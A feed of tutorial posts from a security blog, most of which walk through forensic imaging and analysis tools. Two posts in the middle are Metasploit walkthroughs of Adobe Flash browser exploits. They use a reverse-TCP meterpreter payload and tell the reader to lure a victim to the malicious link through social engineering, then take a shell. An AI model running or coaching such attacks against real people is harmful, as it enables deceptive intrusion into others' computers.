Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what exactly happened on a computer. You can even use it to recover photos from your camera’s memory card for case investigation.

Autopsy features.

• Timeline Analysis:Displays system events in a graphical interface to help identify activity.
• Keyword Search:Text extraction and index searched modules enable you to find files that mention specific terms and find regular expression patterns.
• Web Artifacts:Extracts web activity from common browsers to help identify user activity.
• Registry Analysis:Uses RegRipper to identify recently accessed documents and USB devices.
• LNK File Analysis:Identifies short cuts and accessed documents
• Email Analysis:Parses MBOX format messages, such as Thunderbird.
• EXIF:Extracts geo location and camera information from JPEG files.
• File Type Sorting:Group files by their type to find all images or documents.
• Media Playback:View videos and images in the application and not require an external viewer.
• Thumbnail viewer:Displays thumbnail of images to help quick view pictures.
• Robust File System Analysis:Support for common file systems, including NTFS, FAT12, FAT16, FAT32, HFS+, ISO9660 (CD-ROM), Ext2, Ext3, and UFS from The Sleuth Kit.
• Hash Set Filtering:Filter out known good files using NSRL and flag known bad files using custom hashsets in HashKeeper, md5sum, and EnCase formats.
• Tags:Tag files with arbitrary tag names, such as ‘bookmark’ or ‘suspicious’, and add comments.
• Unicode Strings Extraction: Extracts strings from unallocated space and unknown file types in many languages (Arabic, Chinese, Japanese, etc.).
• File Type Detectionbased on signatures and extension mismatch detection.
• Interesting Files Modulewill flag files and folders based on name and path.
• Android Support: Extracts data from SMS, call logs, contacts, Tango, Words with Friends, and more.

First Download autopsy from here and install in your pc

Click New Case. The ‘Create a New Case’ page will open Even you can use a device clone which was earlier created click here to view

Fill in the ‘Case Name’, ‘Base Directory’and choose the location to save the report Eg:c\users\raj\desktop\autopsy report

Then click on next to proceed to next step. 

Here in next step you have to enter the case number and Examiner details and click on finish to proceed to next step.

Here now in Add Data Sourceyou have to complete the three steps

In first step that is Enter data Source Information  select the following as local disk, location of local disk, time zone as per your location, click on next to proceed to step 2

In Step 2 Configure ingest Modules I have chosen all the modules as I was discussing about complete information on evidence device or disk or computer etc. and click next for step 3

In Add Data Source just click on finish to generate the report of the device and you can perform complete investigate on the victim device or pc or any disk

Here you can see the local disk of the user we can completely analyze  it from here without accessing the actual data in local disk, you can see Data Sources, Views , Results, Email messages, Interesting items, etc.

Now finally when you choose the Data Sources and select the drive we choose you can see the following details will be shown in the image as all the files and folder available in local disk And also with their Modified Time, Change time, Access time, etc.

With these you can investigate on user details in local disk as well as know which file was deleted from the disk and with their time and date along with information. 

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post Forensic Investigation of victim pc using Autopsy appeared first on Hacking Articles.

Do you know how to hack an app? Do you want to learn? All it takes is a few readily available tools and a matter of minutes for today’s hackers to successfully exploit a mobile application. To see how it’s done, watch these short clips below as Jonathan Carter from Arxan Technologies demonstrates just how easy it is for hackers to perform mobile attack vectors.

iTunes Code Encryption Bypass

Android APK Reverse Engineering

Algorithm Decompilation and Analysis

Baksmali Code Modification

Reverse Engineering String Analysis

Swizzle with Code Substitution

Understanding application internal structures and methods via Class Dumps

For more information on how to address these threats and harden the security of your own app, visit Arxan’s application protection page.

The post Learn How to Hack an App Video Series appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post CHFI v8 Lab Manual appeared first on Hacking Articles.

R-Drive Image is a potent utility providing disk image files creation for backup or duplication purposes. A disk image file contains the exact, byte-by-byte copy of a hard drive, partition or logical disk and can be created with various compression levels on the fly without stopping Windows OS and therefore without interrupting your business. These drive image files can then be stored in a variety of places, including various removable media such as CD-R(W)/DVD, Iomega Zip or Jazz disks, etc.

R-Drive Image Features

A simple wizard interface – no in-depth computer management skills are required.

On-the-fly actions: Image files are created on-the-fly, no need to stop and restart Windows. All other disk writes are stored in a cache until the image is created. Data from image files are restored on-the-fly as well, except on a system partition. Data to the system partition can be restored either by restarting R-Drive Image in its pseudo-graphic mode directly from Windows, or by using specially created startup disks.

Image files compression. Image files can be compressed to save free storage space.

Removable media support. Image files can be stored on removable media.

Startup version. A startup version can be used to image / restore / copy partitions locked by the OS. The computer can be re-started into the startup version either directly from Windows, or from an external USB device, a CD/DVD disk, or 6 floppies. The startup version can use either a graphic user interface, or a pseudo-graphic mode, if the graphic card isn’t supported. Support for UEFI boot for modern computers.

USB 2.0 and 3.0 support in the startup version. With hard drives prices constantly going down, an external IDE-USB 2.0 or 3.0 HDD case with an appropriate hard drive is an ideal (fast and reliable) solution for storing backup files for system and other partitions that can be restored only in the startup version. Do not use numerous unreliable CD discs and slow CD/DVD recorders any more. Remember: with the incremental backup, this hard drive is not to be too large.

Network support in the startup version. R-Drive Image startup version supports disk image file creation and restoration over the Microsoft network (CIFS protocol).

Extended List of the supported devices in the startup version. The list of hardware supported by R-Drive Image startup versions has been extende An image file can be connected as a read-only virtual disk. Such disk can be browsed through and files/folders can be found and copied.

Individual files and folders restoration. Individual files and floders rather than entire disk can be restored either during the restoring action or from a image file connected as a virtual disk.

Image files splitting. Drive images can be split into several files to fit a storage medium.

Image Protection. Disk image files can be password-protected and contain comments.

New partition creation. Data from a disk image can be restored on a free (unpartitioned) space on any place on a hard drive. The size of the restored partition can be changed.

Partition replacement. Data from a disk image can be restored on other existing partitions. R-Drive Image deletes such partitions and restores data on that free space.

Disk to Disk copy. An entire disk can be directly copied on another one.

Image files verification. You may check if your image files are good before you store them or restore data from them.

Scheduler. A time for disk image creation may be scheduled and the process can be run in unattended mode.

Script creation for frequent or unattended actions. Such scripts for creating an image file and appending data to an existing image file are created from the R-Drive Image interface the same way the actual action is performed. Scripts are executed from a command line and such command can be included to any command file.

Action Report. When disk image is successfully created or the action fails the report can be automatically sent over e-mail or an external application can be launched.

Support for the ReFS file system (Resilient File System), a new local file system Microsoft has introduced in its Windows 2012 Server. All disk actions are supported, except partition resizing.

Full support for the GPT partitioning layout. R-Drive Image can create GPT disks, resize them, and change their partition layout during copy/restore operations.

Support for Windows Storage Spaces (Windows 8/8.1 and 10), Linux Logical Volume Managervolumes, and MacRAIDs.

First Download R-Drive Image from here and install in your pc

Now open R-Drive Image and click on Create on Image

Select the drive which image you want to create than click on next

You may select all objects on a hard drive by clicking the hard drive icon. . It will show the marked hard drive.

Select the place on the Image Destination panel to which the image files will be written, specify the file name, and click the Next button

If you try to append data to a password-protected image file, the Password prompts. Message will appear. Enter the password and click on next.

Click on NEXT

Verify that the information on the Processing panel is correct and click the Start button

How to Restore Backup

 Click Restore from an Image on the Action Selection panel

Select the file with the image on the Image File Selection panel and click the Next button

Select the object in the image file on the Image Object Selection panel, select a destination, and click the Next button

Now Click on NEXT

Click on start the process of restoring will start and the drive stored in your pc.

Author: Mukul Mohan is a Certified MSCE, MCSA. He is Experienced Corporate Trainer with +20 Years experience. Now he is working with Ignite Technologies as a corporate trainer. if you are interested for Microsoft Server 2008 and Advance Excel you can contact him at mukul@ignitetechnologies.in

The post How to Create Forensics Image of PC using R-Drive Image appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Hacking Web Intelligence appeared first on Hacking Articles.

This module exploits type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.

Exploit Targets

Flash 16.0.0.305

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_net_connection_confusion

msf exploit (adobe_flash_net_connection_confusion)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_net_connection_confusion)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_net_connection_confusion)>set srvhost 192.168.1.7

msf exploit (adobe_flash_net_connection_confusion)>set uripath /

msf exploit (adobe_flash_net_connection_confusion)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.7:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using Adobe Flash Player NetConnection Type Confusion appeared first on Hacking Articles.

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Exploit Targets

Flash 17.0.0.134

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_domain_memory_uaf

msf exploit (adobe_flash_domain_memory_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_domain_memory_uaf)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_domain_memory_uaf)>set srvhost 192.168.1.7

msf exploit (adobe_flash_domain_memory_uaf)>set uripath /

msf exploit (adobe_flash_domain_memory_uaf)>exploit  

Now an URL you should give to your victim http://192.168.1.7:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.7:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using Adobe Flash Player domainMemory ByteArray Use After Free appeared first on Hacking Articles.

P2C is a comprehensive digital investigation tool with over ten years of court-approved use by forensic examiners. An integrated database and true multi-threading mean faster processing. P2C was built on Paraben’s trusted email examination tools for unparalleled network email and personal email archive analysis. Advanced features like Data Triage analysis, Xbox analysis, pornography detection.

First Download the p2 commander from here and install in victim pc and open p2 commander Click New Case the ‘Create a New Case’ page will open

Then click on next to proceed to next step.

Here in next step you have to enter the case name and DEMO details and click on finish to proceed to next step

Here in next step you have to enter the Investigator name and email details and click on finish to proceed to next step

Now Click ‘Add Evidence’->Choose ‘Image File’

Now select Auto-detect Image option from source type which will add the image evidence in any format. You can choose any option from different available options such as Drive Image or Fat Partition Image.

Now load the Evidence Disk Image

How to create Disk Image read this article

 http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

 After selecting the evidence Image, click on Open.

Now you will see the case Demo is created, which will show you the hierarchy of the directories of the evidence image.

Now you can click on any one of the directories of the evidence image and it will show you all the containing files and sub folders within that folder describing   their   file name, file type, file size, creation time and last modification etc.

Now click on generate report tab.

Select the report type which is to be generated. In my case I am selecting HTML Investigative Report & select the destination folder. Then click on next.

Now select the sorted file which is to be added by clicking on Add and Export button with their file types. Now click on next to proceed further.

Now click on Finish to proceed to next step. 

The report file will be saved on your destination folder. Now you will visualize the details of your report.

Author: Mukul Mohan is a Microsoft Certified system engineer in security and messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Technical Training experience you can contact him at mukul@ignitetechnologies.in

The post How to Collect Forensics Evidence of PC using P2 Commander (Part 1) appeared first on Hacking Articles.

Now we are studying about the forensic evidence which we have collected in the previous article.

If you are interested to see the collection of forensic evidence, please click on the below link.

http://www.hackingarticles.in/how-to-collect-forensics-evidence-of-pc-using-p2-commander-part-1/

First of all, we will look into the Trash folder (which contains the files and folders deleted by the user but not erased permanently from system yet).

By clicking on Trash folder, it will show us the different files and folders with their Creation Time, Last Access Time, Last Change Time, and File Size.

Now click on Advanced Registry and System Analyzer and then Auto Run Option.

Go to Run option. It will Show all the programs that can run automatically at the time of booting of the system.

Now Select OS Info option. Through OS Info, we can see the Root Path, Current Version, Registered User, Product ID, Edition ID, and Installation Type.

Now select Uninstall Option from Programs Option. By Uninstall Option, we can see all the programs which are installed in the system.

To see the running services in the system, select Services option.

Now  click on Known DLLs to see the Dynamic Link Libraries ( which contains data and code that are used by different programs simultaneously.)

Now to get the information about the removable disks used recently or in the past, first click on USB Storage and then select USBSTOR. It will show the name of the Disks.

Now select any one of the disk and it will show us the size as well as the manufacturer name.

To see the history of most recently used commands from the Run command on the Start menu click on Users Info Option. Select a user; in my case we are selecting Raj. Now click on RunMRU.

To see the user-based web activities, click on the TypedURLs, which will show the recently visited web sites.

Author: Mukul Mohan is a Microsoft Certified system engineer in security and messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Technical Training experience you can contact him at mukul@ignitetechnologies.in

The post How to study Forensics Evidence of PC using P2 Commander (Part 2) appeared first on Hacking Articles.

The ARC Group ProDiscover® Basic edition is a self-managed tool for the examination of your hard disk security. ProDiscover Basic is designed to operate under the National Institute of Standards’ Disk Imaging Tool Specification 3.1.6 to collect snapshots of activities that are critical to taking proactive steps in protecting your data.

ProDiscover Basic has a built-in reporting tool to present findings as evidence for legal proceedings. You gather time zone data, drive information, Internet activity, and more, piece by piece, or in a full report as needed. You have robust search capabilities for capturing unique data, filenames and filetypes, data patterns, date ranges, etc. ProDiscover Basic gives clients the autonomy they desire in managing their own data security.

At the ARC Group, we provide the tools you need to identify security issues before they escalate, and we use ProDiscover solutions to maintain your corporate safety and preserve your data. With ProDiscover Basic, professional consultants, system administrators, and investigators take the upper hand to manage cyber security at every level and protect information in the case of impending legal actions.

First Download the ProDiscover Basic from here and install it in pc and enter the Project Number, Project File Name and Description in prodiscover basic software. Click on Open.

In main window click on Capture & Add Image

Now select the source drive that we want to capture, this could be a USB Drive or physical Drive.In my case I select drive Physical Drive 1 which is my USB drive.

Now set the destination of the image file where we want to store it, in my case I used E: drive and named the image folder as pd and the name of the image which is to be saved in desired folder is PD.EVE .

Now enter the ‘Technician Name’, ‘Image Number’ and ‘description’ Now Click on ok.

After finishing the following steps, windows will appear.

After imaging the drive close the prodiscover program then it will ask you to save your project.

Now starts prodiscover program again and click on open project and browser your project image select it and click open

Now the project will open & go to the left menu and click on Content View. Then it will show you all   the contents of evidence image.

To generate the automatic report click on report tab under the view menu. Then it will show you Evidence Report.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in.

The post How to gather Forensics Investigation Evidence using ProDiscover Basic appeared first on Hacking Articles.

Mount Image Pro mounts EnCase, FTK, DD, RAW, SMART, SafeBack, ISO, VMWare and other image files as a drive letter (or physical drive) on your computer.

Features of Mount Image Pro

 It enables the mounting of forensic images including:

• EnCase .E01, EX01, .L01, .LX01
• AccessData .AD1
• DD and RAW images (Unix/Linux)
• Forensic File Format .AFF
• NUIX .MFS01
• ProDiscover
• Safeback v2
• SMART
• XWays .CTR

And other common image formats including:

• Apple DMG
• ISO (CD and DVD images)
• Microsoft VHD
• VMWare

Image files as a drive letter under the Windows file system.

IMPORTANT: When dealing with forensic evidence files ensure that you have a Verified and Secured Master copy.

First of all, we are clicking on My Computer option & it will show us all physical drives and removable storage drives.

First Download Mount Image pro from here and install in your pc then open Mount Image Pro and click on Mount button.

It will open the selection window. To add Image file to the selection window, click Add Image option to add an Evidence Raw Image.

Now load the Evidence Disk Image.

How to create Disk Image read this article

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

After selecting the Evidence Image, click on Open.

Now Evidence Image is selected & click on Mount Disk.

The Options window will open now. Click on ok.

Now it will show the mounted image.

Now click on My Computer. It will show you the Mounted Image as a Drive.

Note: This tool is also used to convert VMware Image as a Drive.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Convert Encase, FTK, DD, RAW, VMWare and other image file as Windows Drive appeared first on Hacking Articles.

P2 eXplorer Pro is a specialized component of P2C that allows you to virtually mount forensic images such as raw DD, E01, and even virtual machine images  Free with any puchase of P2C. as local drive letters

P2 eXplorer Pro can mount the following image formats: Encase (E01), Forensic Replicator (PFR), SafeBack 1, 2, & 3, SMART, FTK DD & E01, Raw DD, WinImage, Paraben’s Forensic Containers (P2S), vmWare, VirtualPC, & VirtualBox (VDI).

First of all, we are clicking on My Computer option & it will show us all physical drives and removable storage drives.

First Download P2 eXplorer from here and install in your pc then open P2 eXplorer and click on Mount Storage button.

Now load the Evidence Disk Image by clicking on Browse Option

How to create Disk Image read this article

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

Now it will show the mounted Image.

Now click on My Computer. It will show you the Mounted Image as a Drive.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Mount Forensics image as a Drive using P2 eXplorer Pro appeared first on Hacking Articles.

Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats:

• DD /RAW (Linux “Disk Dump”)
• AFF (Advanced Forensic Format)
• E01 (Encase®)

Program Functions

Forensic Image provides three separate functions:

• Acquire: The acquire option is used to take a forensic image (an exact copy) of the target media into an image file on the investigators workstation;
• Convert: The convert option is used to copy an existing image file from one image format to another, e.g. DD to E01;
• Hash or verify: The hash or verify option is used to calculate a hash value, MD5, SHA1 or SHA256, for a device or an existing image file.

Includes the option to SHA256 sector hash a device so that known sectors can be located within an image files (e.g. a single sector of a jpeg file left in unallocated clusters can be identified by its sector hash).

First Download Forensics Imager from here and install in your pc then open Forensics Imager and click on Acquire option.

It will show you all drives. Select the desired Drive whose image to be created. Click on next.

Now select image type from drop down menu and select the output filename in Folder option where you want to save your Evidence Image and fill the details such as Case Name, Evidence Number, and Examiner etc. And click on start.

Now it will show you the Acquisition Progress. After the completion of this progress, it will create a raw image in the specified folder.

Now we will proceed further to Convert RAW File in to Encase Format.

Now again open forensics imager click on add image and select your desired image which is to be converted.  Then click on next.

Now we will select image type from Drop down Menu now select your desired format you want to be converting and select the output file in the folder Option where you want to save your Raw image in Encase format. Click on Start Option.

Now it will show us Conversion Progress & after the completion of this progress a Encase formatted file will be created in the specified folder.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Create and Convert RAW Image in Encase and AFF Format using Forensics Imager appeared first on Hacking Articles.

OS Forensics allows you to identify suspicious files and activity with hash matching, drive signature comparisons, e-mails, memory and binary data.

It lets you extract forensic evidence from computers quickly with advanced file searching and indexing and enables this data to be managed effectively.

Features

• Discover Forensic Evidence Faster
• Find files faster, search by filename, size and time
• Search withinfile contents using the Zoom search engine
• Search throughemail archives from Outlook, ThunderBird, Mozilla and more
• Recover and searchdeleted files
• Uncoverrecent activity of website vists, downloads and logins
• Collect detailedsystem information
• Password recovery from web browsers, decryption of office documents
• Discover and revealhidden areas in your hard disk
• BrowseVolume Shadow copies to see past versions of files
• Identify Suspicious Files and Activity
• Verify and match files with MD5, SHA-1 and SHA-256 hashes
• Findmisnamed files where the contents don’t match their extension
• Create and comparedrive signatures to identify differences
• Timeline viewerprovides a visual representation of system activity over time
• File viewer that can display streams, hex, text, images and meta data
• Email viewerthat can display messages directly from the archive
• Registry viewer to allow easy access to Windows registry hive files
• File system browser for explorer-like navigation of supported file systems on physical drives, volumes and images
• Raw disk viewer to navigate and search through the raw disk bytes on physical drives, volumes and images
• Web browser to browse and capture online content for offline evidence management
• ThumbCache viewer to browse the Windows thumbnail cache database for evidence of images/files that may have once been in the system
• SQLite database browser to view the and analyze the contents of SQLite database files
• ESEDB viewerto view and analyze the contents of ESE DB (.edb) database files, a common storage format used by various Microsoft applications
• Prefetch viewer to identify the time and frequency of applications that been runnning on the system, and thus recorded by the O/S’s Prefetcher

First Download OS Forensic  from here and install in your pc then open OS Forensic and click on create  case  button to  create a new forensic case.

Now enter the details such as Case Name, Investigator Name, Default Drive, and Acquisition Type.

To specify the case folder, click on browse & select the Location where you want to save your Evidence Report.

Now it will show us the registered case in this tool. Now to manage this case, click on Add Device option available in Manage Current Case.

Now select Image File option in Select Device to add option. Now assign the path of the folder where image file exists and also give the Display Name which is compulsory. Click on OK Button.

Now it will show us the details of the Image File.

Now to search the file based on file type click on the option File Name Search .Browse the forensic Image file in Start Folder. Select Preset Popup Menu to specify the type of the file such as images, audio, or video etc. It will show the file list.

Now to get the recent activity which is helpful to see the latest trends and activities of the user, click on    Recent Activity Option and select the Scan Drive option and then click on Scan Option.

To find the Deleted File from User System, Click on Deleted File Search. Select Forensic Image File and click on Search option. It will show all the deleted files in the Forensic Image File. To see the working of other options in this tool wait for the article which is coming soon?

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigation of Evidence RAW Image using OS Forensics Tool appeared first on Hacking Articles.

By OSForensics

Creating a signature generates a snapshot of the directory structure of the drive at the point of creation. This information includes data about a file’s directory path, file size and file attributes.

 How to Create Signature

 First of all download the OSForensics from here.

Select Create Signature Option. Click on Config .

Now browse the desired Directory from Directory list management, in my case I am selecting h: Drive which specifies Pen drive. Click on Add to list Option to include the directory. Click OK.

Now in start folder option, it will show us the selected Drive i.e. H: Drive. Click on the Start Option.

It will ask for the File Name, enter the File Name & click on Save. So signature for data drive will be created.

Now does some modification in data drive and repeat the same steps to create another signature after modifications in data drive.

Now click on Compare Signature Option.

Browse both files in Old Signature as well as in New Signature Option.

Click on Compare option .It will start the process. Now it will show us the files with their modification status as well as their creation and modification date. We can select show option to see only modified or deleted files.

By Clicking on the modified file, it will show the file differences by showing old as well as new signature path, its creation and modification date.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to identify any Suspicious changes to files or directory (Disk Drive Signature) appeared first on Hacking Articles.

Forensicopy is designed to copy evidence files from one location to another while maintaining the original timestamps (MAC Times). It also creates a hash of all the files before and after the copy process and verifies that the file has been copied accurately. A extensive logfile is generated during the copy process in order to maintain the chain of custody.

 Please note:

Forensicopy is designed to copy evidence files. It’s not a substitute for a forensic image. If possible you should always create a full forensic drive image. Only in situations where it’s not possible to create a forensic image it’s recommended to make a forensic copy with a tool like Forensicopy.

First of all we are copying a file from one location to another, while copying the timestamp will change.

As you will see below.

So copying forensic file, the timestamp should remain the same. To do so we are using Forensicopy tool.

In Forensicopy tool, browse the file which is to be copied in source directory.

Browse the path for folder where file will be copied and click on start.

It will show the message for copy completion and ask for log file to be exported

Now we will see the properties of the copied file. Its timestamp will remain the same.

After log file creation, we will open the log file; it will show us the timestamp of start copy, finish copy, source, and destination of all the Files in that folder. The timestamp will remain the same.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Preserve Forensics Image file Timestamp appeared first on Hacking Articles.

Forensically examine hundreds of email formats including Outlook (PST and OST), Thunderbird, Outlook Express, Windows mail, and more. Paraben’s Email Examiner is one of the most comprehensive forensically sound email examination tools available. Email Examiner allows you to analyze message headers, bodies, and attachments. Email Examiner doesn’t just recover email in the deleted folders; it recovers email deleted from deleted items.

• Microsoft Outlook (PST)
• Microsoft Outlook Offline Storage (OST)
• America On-line (AOL)
• The Bat! (version 3.x and higher)
• Thunderbird
• Outlook Express
• Eudora
• Email file – RFC 833 Compliant(EML)
• Windows mail databases
• Maildir
• Plain Text mail
• Support for more than 750 MIME Types

First Download the E-Mail Examiner from here and install in victim pc and open E-Mail Examiner Click on ‘Create a New Case’ option.

New Case window will be open. Then click on next to proceed to next step.

Here in next step you have to enter the case name as DEMO and description details and click on finish to proceed to next step.

Here in next step you have to enter the Investigator name and email details and click on finish to proceed to next step.

Then it will ask for the file name to save your case in your specified location. Click on save option.

Now select MS Outlook Image option from source type which will add the outlook image evidence.

After selecting the evidence outlook Image, click on Open.

Now you have to select both option and click on ok to proceed next step.

Now you will see the case Demo is created, which will show you the hierarchy of the directories of the evidence outlook image. Now it will allow you to analyze the message header, bodies and attachments.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Outlook Forensics Investigation using E-Mail Examiner appeared first on Hacking Articles.

Forensic Replicator is a bit-stream forensic image creation tool. Forensic Replicator is a Windows based tool that creates bit-by-bit raw DD images of hard drives and related media. You can also create images in PFR format to encrypt the image, compress it, or break it up into smaller pieces. Forensic Replicator gives you everything you would expect in a forensic imaging tool. 

 Features

• Drive to Drive image option
• Creates bit-stream images of removable media, partitions, or an entire physical hard drive
• Creates images of USB micro drives
• New explore function allows for preview of active FAT files–tree and detail view available
• Allows for reprocessing of image files from Raw to Split or add compression as a new image file
• Compresses image files on the fly
• Encrypts data for secure storage of evidence-128 bit
• Splits images into segments for portability
• Generates self-extracting images
• Formats and copies DMF/1.68 MB floppy
• Creates ISO CDRom images and allows immediate browsing of data
• Automates floppy imaging with convenient Batch Assistant mode

First Download Forensic Replicator from here and install the Forensic Replicator.

Now click on file option & select create physical drive image

It will show creating physical drive image window. Click on next.

Now choose the drive of the Suspect Evidence you want to make image.

Now browse location and name of physical image file to create. Select save in raw format option. Click on next.

Select the file format such as Text File, Html File or Xml File. Select information for inclusion in the report   i.e.  Image information, Time and Date of Acquisition, Export Partition structure & Add report header & click on Next

Now enter the details such as case no. , Evidence No. , Company /Agency etc. Click on Finish.

Now it will ask for File Name. Enter the file name & select the folder where report file is to be saved. Click on save.

Now it will create the raw image.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Create Drive Image for Forensic Purpose using Forensic Replicator appeared first on Hacking Articles.

Internet Evidence Finder is designed to find Internet-related data or files on a hard drive as part of a digital forensics investigation. In this regard, the purpose of this application really contrasts the simplicity of its design.

Features

• Browser Activity
• Instant Messaging
• Chat Apps
• Social Networking
• P2P File Sharing
• Web Search
• Search Toolbar
• Media Files
• Webmail
• Cloud Drive Mapping

First Download IEF from here and install the IEF & open the tool IEF. Now click images first.

Select the image file to load & click on open option.

It will show the image file. Click on Next.

Click on ok.

Now it will show the location and search type .Click on next.

Select the items which are to be investigated. Click on next

Click on browse to select the destination folder. Assign the case Name, case no. & Examiner’s name.Click on find evidence.

Now it will show us the processing status.

After process completion, IEF report. Now click on FaceBook URLs. It will show all the FaceBook URLs with date and time.

By clicking on Google Analytics URLs, it will show the details of URLs with page title and host name.

Now click on Google search, it will show the URLs with original search query.

By selecting Skype Chat Message, it will show the Message and identifier.

Now select FaceBook Chat Option. It will show the FacBook chat message.

By selecting FaceBook status update. It will show the updated status.

By clicking on any one of the Browser activity option such as opera/360 safe browser. It will show opera history.

By selecting IE inPrivate/Recovery URLs. It will show IE history.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder) appeared first on Hacking Articles.

OSFMount allows you to mount local disk image files (bit-for-bit copies of a disk partition) in Windows with a drive letter. You can then analyze the disk image file with PassMark OSForensics by using the mounted volume’s drive letter.

First of all, we are clicking on My Computer option & it will show us all physical drives and removable storage drives.

First Download OSFMount from here and install in your pc then open OSFMount and click on Mount new button.

Now load the Evidence Disk Image by clicking on Browse Option.

Now it will show the mounted Image.

Now click on My Computer. It will show you the Mounted Image as a Drive.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Mount RAW Image and ISO Image as a Drive using OSF Mount appeared first on Hacking Articles.